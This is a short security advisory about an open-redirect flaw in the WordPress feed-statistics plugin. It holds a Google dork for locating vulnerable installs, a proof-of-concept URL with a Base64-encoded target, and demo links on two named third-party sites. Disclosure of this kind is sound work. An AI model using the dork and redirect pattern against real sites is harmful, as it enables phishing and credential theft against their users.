WordPress Feed-Statistics 4.1 Open Redirect

2017.12.22
Credit: Mostafa Gharzi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

[+] Title: WordPress feed-statistics Plugin Open Redirect Vulnerability [+] Date: 2017-12-20 [+] Author: Mostafa Gharzi [+] Vendor Homepage: www.WordPress.org [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable File: /feed-statistics.php?url= [+] Vulnerable Parameter: Get Method [+} Dork : inurl:/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url= ### Notes: Unvalidated Redirects vulnerability in feed-statistics Plugin of WordPress , allows when application accepts untrusted input that could cause the web application to redirect the request to a URL contained within an untrusted input. By modifying untrusted URLs into a malicious site, an attacker can successfully launch a phishing and steal user credentials. ### URL Encoded by Base64: [+] Example: https://www.google.com/ ==> Base64 Algorithm ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### POC: [+} http://Site/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=[URL Encoded by Base64] ### Demo: [+] http://blog.caplin.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= [+] http://fabianferber.de/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### Special Thanks: [+] CertCC.ir [+] Gucert.ir


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top